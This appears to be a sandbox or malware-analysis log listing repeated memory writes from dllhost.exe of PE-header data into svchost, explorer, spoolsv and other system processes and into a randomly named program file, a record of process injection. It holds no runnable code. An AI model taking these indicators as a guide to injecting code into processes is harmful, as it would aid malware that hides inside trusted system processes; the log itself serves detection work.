Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1FE4A4B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 24C19A40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 275D2660000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23BBDC90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23BBDCC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 227D8FC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 227D9540000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2DED2C70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 14ACE6B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2DED2C70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 14ACE6E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 220AEFD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 220AF660000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 241B6940000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 241B6970000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 202A22A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 14D25AA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1BD1A2F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 21A63950000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1834ABA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2D8F03D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 18BAF3C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 256EBEB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2568E1B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 226A7DC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\spoolsv.exe base: 12A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1E2C0F50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2EE0D7C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 22B68FC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 207EA800000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 1EBCE890000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 11CD5BB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1AFDEB70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 207C0460000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 245A2150000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 24708EB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 22F60740000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 26E569B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2CA8FE60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\sihost.exe base: 1D63DC20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1A799B20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1F6984F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 26481BB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 166D2D90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\ctfmon.exe base: 128DE440000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2101D0E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\explorer.exe base: 86A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 192D1E50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 26DD2000000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 257155B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dasHost.exe base: 16443E50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2C8A6F80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1E968250000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1A9452E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dllhost.exe base: 29227D20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 283E5BE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\smartscreen.exe base: 14BB07C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 22C4F660000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1DBAE500000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 27B1B9F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 27FF3CD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 281CF7C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 207EA800000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 28843650000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 1EBCE890000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 25F39DF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1AFDEB70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 3CF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 207C0460000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 1B409660000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 245A2150000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1C5325C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 24708EB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 225DEC30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 22F60740000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 15EC91C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2CA8FE60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 500000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\sihost.exe base: 1D63DC20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 730000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1A799B20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1440000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1F6984F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 410000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 26481BB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: BD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 166D2D90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: C30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\ctfmon.exe base: 128DE440000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2101D0E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 470000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\explorer.exe base: 86A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: D90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 192D1E50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 26DD2000000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 13D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 257155B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 600000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dasHost.exe base: 16443E50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: BB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2C8A6F80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 920000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1E968250000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 970000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1A9452E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1020000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dllhost.exe base: 29227D20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 590000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 283E5BE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1200000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\smartscreen.exe base: 14BB07C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 13F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 22C4F660000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: B20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1DBAE500000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1300000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 27B1B9F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 27FF3CD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 760000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 281CF7C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 12E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 28843650000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: BD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 25F39DF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1320000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 3CF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1100000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 1B409660000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 7D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1C5325C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 820000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 225DEC30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 15EC91C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1200000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 500000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: B20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 730000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 5F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1440000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1230000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 410000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: A00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: BD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: C30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 7E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 470000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: BD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: D90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 6C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1300000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 13D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1410000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 600000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 13C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: BB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 6C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 920000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: FA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 970000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: CC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1020000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: EE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 590000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 11E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1200000 value starts with: 4D5A
